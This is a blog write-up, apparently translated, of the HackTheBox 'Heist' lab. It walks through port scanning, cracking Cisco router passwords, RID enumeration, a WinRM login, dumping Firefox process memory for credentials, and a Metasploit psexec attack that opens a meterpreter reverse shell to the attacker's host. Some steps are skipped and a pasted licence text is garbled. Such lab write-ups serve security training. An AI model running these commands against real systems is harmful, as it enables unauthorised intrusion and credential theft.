I tried deciphering the encrypted passwords (Type 5, Type 7) set on my Cisco device! HackTheBox Heist Writeup
The URL has been copied!
This time, we will try cracking the encryption password set on the Cisco device and breaking into the server. "HackTheBox-Heist: https://www.hackthebox.com/machines/heist "
First, start the target machine and check the Target IP Address.
Scanning
Let's start with scanning.
nmap
Port scans are performed using nmap.
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox] └─$ nmap -p- --min-rate 10000 10.129.121.71 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:16 JST Nmap scan report for 10.129.121.71 Host is up (0.33s latency). Not shown: 65530 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds 5985/tcp open wsman 49669/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 67.14 seconds
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox] └─$ nmap -sC -sV -p 80,135,445,5985,49669 10.129.121.71 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 09:20 JST Nmap scan report for 10.129.121.71 Host is up (0.42s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE | http-title: Support Login Page |_Requested resource was login.php |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49669/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -1s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb2-time: | date: 2023-09-12T00:21:17 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 107.46 seconds
It seems that HTTP, RPC, SMB, and WinRM are open.
PORT
STATUS
SERVICE
80/tcp
open
http
135/tcp
open
msrpc
445/tcp
open
microsoft-ds
5985/tcp
open
wsman
49669/tcp
open
[unknown]
HTTP (80/tcp)
HTTP is open, so please check it. It appears that there is a login page here.
I tried a few things, such as "admin:admin" and "admin:password", but I was unable to log in.
There is a "Login as guest" so I'll try logging in to the guest.
There was a post about the Cisco router and there was an attachment.
version 12.2 no service pad service password-encryption ! isdn switch-type basic-5ess ! hostname ios-1 ! security passwords min-length 12 enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91 ! username rout3r password 7 0242114B0E143F015F5D1E161713 username admin privilege 15 password 7 02375012182C1A1D751618034F36415408 ! ip ssh authentication-retries 5 ip ssh version 2 ! ! router bgp 100 synchronization bgp log-neighbor-changes bgp damening network 192.168.0.0Â mask 300.255.255.0 timers bgp 3 9 redistributed connected ! ip classless ip route 0.0.0.0 0.0.0.0 192.168.0.1 ! ! access-list 101 permit ip any dialer-list 1 protocol ip list 101 ! no ip http server no ip http secure-server ! line vty 0 4 session-timeout 600 authorization exec SSH transport input ssh
Gaining Access
Let's use the Cisco router information mentioned earlier to obtain access rights.
Password cracking
The attachment contains the following statement: It is in Cisco Type 5 format.
It is not possible to decode it as it is hashed by the MD5 algorithm used in enable secret. I'll try brute force using John The Ripper.
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox] └─$ john --fork=4 -w=/usr/share/wordlists/rockyou.txt hashes Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long" Use the "--format=md5crypt-long" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3]) Will run 4 OpenMP threads per process (16 total across 4 processes) Node numbers 1-4 of 4 (fork) Press 'q' or Ctrl-C to abort, almost any other key for status stealth1agent (?) 3 1g 0:00:00:17 DONE (2023-09-10 17:35) 0.05763g/s 50550p/s 50550c/s 50550C/s steamy!!!!..staterr 1 0g 0:00:01:00 DONE (2023-09-10 17:36) 0g/s 52513p/s 52513c/s 52513C/s 2346256..2334364 Waiting for 3 children to terminate 4 0g 0:00:00:59 DONE (2023-09-10 17:36) 0g/s 40471p/s 40471c/s 40471C/s babybillie..baby2626 2 0g 0:00:01:00 DONE (2023-09-10 17:36) 0g/s 54014p/s 54014c/s 54014C/s 1593572584561..1579468342 Use the "--show" option to display all of the cracked passwords reliably Session completed.
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox] └─$ smbclient -L \\\\\10.129.120.32 -U Hazard Password for [WORKGROUP\Hazard]: Sharename Type Comment ----- ---- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.129.120.32 failed (Error NT_STATUS_IO_TIMEOUT) Unable to connect with SMB1 -- no workgroup available
You can log in, but since you cannot access the shares using SMBClient, there seems to be no particular information.
The " Machine SID " is automatically generated when you set up your computer. The RID (Relative Identifier) of the built-in Administrator is fixed at "500" and the RID of Guest is fixed at "501". Users and groups RIDs are used in order starting with 1000
In other words, we'll try to check out users with SIDs of 1000 or more.
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox] └─$ for i in {1000..1050}; do rpcclient -U 'hazard%stealth1agent' 10.129.120.32 -c "lookupsids S-1-5-21-4254423774-1266059056-3197185112-$i" | grep -v unknown; done S-1-5-21-4254423774-1266059056-3197185112-1008 SUPPORTDESK\Hazard (1) S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1) S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1) S-1-5-21-4254423774-1266059056-3197185112-1013 SUPPORTDESK\Jason (1)
You can do the same with lookupsids.py!
Add new users to the users you just created.
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox] └─$ cat users rout3r admin Hazard support Chase Jason
With this information, try running crackmapexec again.
If you encounter "Error: An error of type HTTPClient::ReceiveTimeoutError happened, message is executed expired", check here!
Try logging in with evil-winrm.
┌──(hack_lab㉿DESKTOP-O3RMU7H)-[~/HackTheBox] └─$ evil-winrm -i 10.129.96.157 -u Chase -p 'Q4)sJu\Y8qz*A3?d' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quotation_detection_proc() function is unconfigured on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Chase\Documents>
I was able to log in without any problems! There is user.txt here, so enter the flag and you're done.
*Evil-WinRM* PS C:\Users\Chase\Desktop> ls Directory: C:\Users\Chase\Desktop Mode LastWriteTime Length Name ---- ---- ---- ----- ----- -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- *Evil-WinRM* PS C:\Users\Chase\Desktop> cat todo.txt Stuff to-do: 1. Keep checking the issues list. 2. Fix the router config. Done: 1. Restricted access for guest user. *Evil-WinRM* PS C:\Users\Chase\Desktop>
Elevation of Privilege
I'll continue to try to promote privileges like this.
Get password from process dump
Looking at todo.txt, Chase is planning to check the issues list
Once uploaded, specify your firefox ID and get the dump.
*Evil-WinRM* PS C:\Users\Chase\Desktop> .\procdump.exe -ma 6152 firefox.dmp ProcDump v11.0 - Sysinternals process dump utility Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com SYSINTERNALS SOFTWARE LICENSE TERMS These license terms are an agreement between Sysinternals(a wholly owned subsidiary of Microsoft Corporation) and you.Please read them.They apply to the software you are downloading from technet.microsoft.com / sysinternals, which includes the media on which you received it, if any.The terms also apply to any Sysinternals * updates, *supplements, *Internet - based services, *and support services for this software, unless other terms belongs those items.If so, those terms apply. BY USING THE SOFTWARE, YOU ACCEPT THESE TERMS.IF YOU DO NOT ACCEPT THEM, DO NOT USE THE SOFTWARE. If you comply with these license terms, you have the rights below. INSTALLATION AND USER RIGHTS You may install and use any number of copies of the software on your devices. SCOPE OF LICENSE The software is licensed, not sold.This agreement only gives you some rights to use the software.Sysinternals reserves all other rights.Unless applicable law gives you more rights destination this limitation, you may use the software only as expressly permitted in this agreement.In doing so, you must comply with any technical limitations in the software that only allow you to use it in certain ways.You may not * work around any technical limitations in the software; *reverse engineer, decompile or disassemble the software, except and only to the extent that applicable law expressly permitted in this agreement.In doing so, you must comply with any technical limitations in the software that only allow you to use it in certain ways.You may not * work around any technical limitations in the software; *reverse engineer, decompile or disassemble the software, except and only to the extent that applicable law expressly permitted in this agreement.In doing so, you must comply with any technical limitations in the software that only allow you to use it in certain ways.You may not work around any technical limitations in the software; *reverse engineer, decompile or disassemble the software, except and only to the extent that applicable law expressly permitted in this agreement. *make more copies of the software than specified in this agreement or allowed by applicable law, destination this limitation; *publish the software for others to copy; *rent, lease or lend the software; *transfer the software or this agreement to any third party; or *use the software for commercial software hosting services. SENSITIVE INFORMATION Please be aware that, similar to other debug tools that capture “process state” information, files saved by Sysinternals tools may include personally Identifiable or other sensitive information(such as usernames, passwords, paths to files accessed, and paths to registry accessed).By using this software, you acknowledge that you are aware of this and take sole responsibility for any personally identifyable or other sensitive information provided to Microsoft or any other party through your use of the software. DOCUMENTATION Any person that has valid access to your computer or internal network may copy and use the documentation for your internal, reference purposes. EXPORT RESTRICTIONS The software is subject to United States export laws and regulations.You must comply with all domestic and international export laws and regulations that apply to the software.These laws include restrictions on destinations, end users and end use.For additional information, see www.microsoft.com / exporting . SUPPORT SERVICES Because this software is "as is, " we may not provide support services for it. ENTIRE AGREEMENT This agreement, and the terms for supplements, updates, Internet - based services and support services that you use, are the entire agreement for the software and support services. APPLICABLE LAW United States.If you acquired the software in the United States, Washington state law governs the interpretation of this agreement and applies to claims for breach of it, regardless of conflict of laws principles.The laws of the state where you live govern all other claims, including claims under state consumer protection laws, unfair competition laws, and in tort. Outside the United States.If you acquired the software in any other country, the laws of that country apply. LEGAL EFFECT This agreement describes certain legal rights.You may have other rights under the laws of your country.You may also have rights with respect to the party from whom you acquired the software.This agreement does not change your rights under the laws of your country if the laws of your country do not permit it to do so. DISCLAIMER OF WARRANTY The software is licensed "as - is." You bear the risk of using it.Sysinternals gives no express warranties, guarantees or conditions.You may have additional consumer rights under your local laws which this agreement cannot change.To the extent permitted under your local laws, sysinternals excludes the Implemented warranties of merchantability, fitness for a particular purpose and non - infringement. LIMITATION ON AND EXCLUSION OF REMEDIES AND DAMAGES You can recover from sysinternals and its suppliers only direct damages up to US$5.00.You cannot recover any other damages, including consequential, lost profits, special, indirect or incidental damages. This limitation applies to * anything related to the software, services, content(including code) on third party Internet sites, or third party programs; and * claims for breach of contract, breach of warranty, guarantee or condition, strict liability, negligence, or other tort to the extent permitted by applicable law. It also applies even if Sysinternals known or should have known about the possibility of the damages.The above limitation or exclusion may not apply to you because your country may not allow the exclusion or limitation of incidental, Consequential or other damages. Please note: As this software is distributed in Quebec, Canada, some of the clauses in this agreement are provided below in French. Remarque: The Ce Logiel is a consequence of the fournies - the fournies of the fournies. EXONÉRATION DE GARANTIE.Leave logiciel visé par une licence « tel quel ».Toute utilisation de ce The authorities are unable to use the system to protect the local government. The authorities are unable to access the system in a way that is necessary for the local government to protect the local government. DOMMAGES - INTÉRÊTS ET EXCLUSION DE RESPONSABILITÉ POUR LES DOMMAGES. Vous pouvez obtenir de Sysinternals et de sess fournisseurs une indemnisation en cas de dommages directs uniqueness à hauteur de 5,00 $ US. Vous pouvez prétendre à aucune indemnisation pour les autres, y compliments dommages spéciaux, indirects accessoires et pertes de bénéfices. Cette Limitation concern: touting services, services that involve contenuation (y complimentary code) figurant sur sites Internet tiers are based on the programmes; The company pays for the purpose of restricting the lives of the people, and the people who limit themselves to the people who limit their lives. EFFET JURIDIQUE. Less contrast décrit certain droits. Vous pourriez avoir d'autres droits prévus par les lois de votre pays. This is the first run of this program. You must accept EULA to continue. Use -accepteula to accept EULA.
If it continues like this, it seems that it will not be possible. First of all, they ask you to do -accepteula.
*Evil-WinRM* PS C:\Users\Chase\Desktop> ./procdump.exe -accepteula ProcDump v11.0 - Sysinternals process dump utility Copyright (C) 2009-2022 Mark Russinovich and Andrew Richards Sysinternals - www.sysinternals.com Monitors a process and writes a dump file when the process exceeds the specified criteria or has an exception.
msf6 > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/psexec) > options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- yes The SMB service port (TCP) SERVICE_DESCRIPTION no Service description to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBUser no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command.
The following parameters are set:
RHOSTS: Target Machine
RPORT: 445
SMBPass: 4dD!5}x/re8]FBuZ
SMBUser: Administrator
SMBSHARE: ADMIN$
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.129.96.157 RHOSTS => 10.129.96.157 msf6 exploit(windows/smb/psexec) > set RPORT 445 RPORT => 445 msf6 exploit(windows/smb/psexec) > set SMBPass 4dD!5}x/re8]FBuZ SMBPass => 4dD!5}x/re8]FBuZ msf6 exploit(windows/smb/psexec) > set SMBUser Administrator SMBUser => Administrator msf6 exploit(windows/smb/psexec) > set SMBSHARE ADMIN$ SMBSHARE => ADMIN$
Once the parameters are set, try running. If successful, I was able to escalate privileges by typing shell!
msf6 exploit(windows/smb/psexec) > run [*] Started reverse TCP handler on 10.10.16.6:4444 [*] 10.129.96.157:445 - Connecting to the server... [*] 10.129.96.157:445 - Authenticating to 10.129.96.157:445 as user 'Administrator'... [*] 10.129.96.157:445 - Selecting PowerShell target [*] 10.129.96.157:445 - Executing the payload... [+] 10.129.96.157:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (175686 bytes) to 10.129.96.157 [*] Meterpreter session 1 opened (10.10.16.6:4444 -> 10.129.96.157:49686) at 2023-09-12 08:06:48 +0900 meterpreter > shell Process 4760 created. Channel 1 created. Microsoft Windows [Version 10.0.17763.437] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>cd \users\administrator cd \users\administrator C:\Users\Administrator>cd Desktop cd Desktop C:\Users\Administrator\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is FA65-CD36 Directory of C:\Users\Administrator\Desktop 02/18/2021 04:00 PM<DIR> . 02/18/2021 04:00 PM<DIR> .. 09/12/2023 04:11 AM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 3,738,165,248 bytes free C:\Users\Administrator\Desktop>cat root.txt cat root.txt 'cat' is not recognized as an internal or external command, operable program or batch file. C:\Users\Administrator\Desktop>type root.txt type root.txt cfd19444abeea6036035be9dcaf6cbb1 C:\Users\Administrator\Desktop>
summary
This time, I cracked the encryption password set on my Cisco device and tried to break into the server. It's a bit exciting to think about how it's possible to hack familiar products! ! (lol)
This is a blog I started to study information security. As a new employee, I would be happy if you could look with a broad heart. There is also Teech Lab, which is an opportunity to study programming fun, so if you are interested in software development, be sure to take a look!
Pochip
![[HackTheBox] What to do if "An error of type HTTPClient::ReceiveTimeoutError happened, message is executed expired" appears in Evil-WinRM](https://hack-lab-256.com/wp-content/uploads/2023/09/hack-lab-256-samnail-4-300x169.jpg)
![[CVE-2015-3306] I enumerated the shared Samba, manipulate a vulnerable version of proftpd, and escalated privileges by manipulating path variables! TryHackMe Kenobi Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-2-300x169.jpg)
![[Permanent CTF for beginners] setodaNote CTF WEB Writeup! Recommended for getting a sense of CTF!](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-1-1-300x169.jpg)
![[TryHackMe] We conducted packet analysis using wireshark to investigate the intrusion of ssh-backdoor! Overpass2 Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-300x169.jpg)
![[CVE-2018-16763] fuel CMS 1.4.1 - I converted Remote Code Execution (1) to python 3 and hacked it! TryHackMe Ignite Writeup](https://hack-lab-256.com/wp-content/uploads/2023/08/hack-lab-256-samnail-25-300x169.jpg)
![[TryHackMe] I used SSH2John to extract the hash from the private key and hacked the password with John the Ripper! Overpass Writeup](https://hack-lab-256.com/wp-content/uploads/2023/07/hack-lab-256-samnail-24-300x169.jpg)
![[TryHackMe] I tried infiltrating a Windows machine with a ret2esp attack (Buffer Overflow)! Brainstorm Writeup](https://hack-lab-256.com/wp-content/uploads/2023/06/hack-lab-256-samnail-23-300x169.jpg)
![[CVE-2019-9053] I tried hacking it using the SQL injection vulnerability in CMS Made Simple! (Python3) TryHackMe Simple CTF Writeup](https://hack-lab-256.com/wp-content/uploads/2023/05/hack-lab-256-samnail-22-300x169.jpg)